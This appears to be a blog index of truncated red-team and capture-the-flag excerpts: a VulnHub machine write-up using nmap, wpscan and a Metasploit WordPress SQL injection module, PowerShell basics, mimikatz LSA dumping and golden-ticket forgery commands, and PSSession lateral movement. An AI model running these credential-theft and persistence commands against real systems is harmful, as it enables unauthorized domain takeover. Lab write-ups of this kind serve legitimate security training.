Vulnerable Machine Writeup * VULNHUB

HACKER FEST 2019 (VULNHUB)

Vulnhub Link: https://download.vulnhub.com/hackerfest/HF2019-Linux.ova root@kali:~# nmap -A 192.168.0.20 port : 21 , 22 , 80 , 10000 Enumeration : http://192.168.0.20 now on terminal root@kali:~# wpscan –url http://192.168.0.20/ WordPress Google maps Sqli Exploit : msf5 > use auxiliary/admin/http/wp google_maps_sqlimsf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 192.168.0.20msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit we get the output webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl root@kali:~# gedit hash webmaster […]

Powershell * RED TEAM SECURITY

Powershell Begineer

Powershell Help system : List everything which contains the word process : PS C:\Users\victim6\Downloads\new\new> get-help *process* PS C:\Users\victim6\Downloads\new\new> get-help about_* PS C:\Users\victim6\Downloads\new\new> $psversiontable PS C:\Users\victim6\Downloads\new\new> get-help Get-Process -Parameter name PS C:\Users\victim6\Downloads\new\new> get-help * Update the help system (v3+) PS C:\Users\victim6\Downloads\new\new> update-help List full help about a topic PS C:\Users\victim6\Downloads\new\new> get-help get-item Lists examples of how […]

Powershell * RED TEAM SECURITY

Persistence Flow

Persistence Technique: Golden Ticket: Execute mimikatz on DC: mimikatz # privilege::debug mimikatz # lsadump::lsa /patch -computername WIN-2RUMVG5JPOC PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”lsadump::lsa /patch”‘ On any machine: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::golden /user:administrator /domain:security.local /sid:S-1-5-21-2515352101-914078745-3278884511-1001 /krbtgt:30ca30e0cbc0f87b2f5bac01794a2357 /id:500 /groups:513 /ptt”‘ To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for […]

Powershell * RED TEAM SECURITY

Lateral Movement Protocols And Tools

One-to-one: PSSession Interactive Runs in a new process (wsmprovhost) Is stateful Useful cmdlets Nw-PSSession Enter-PSSession PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> New-PSSession -ComputerName  WIN-2RUMVG5JPOC PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Enter-PSSession -Session $sess [WIN-2RUMVG5JPOC]: PS C:\Users\Administrator\Documents> hostname One-to-many: Also known as fan-out remoting. Non-interactive. Executes commands parallel. Useful cmdlets. Invoke-command: Invoke-command Run commands & scripts on […]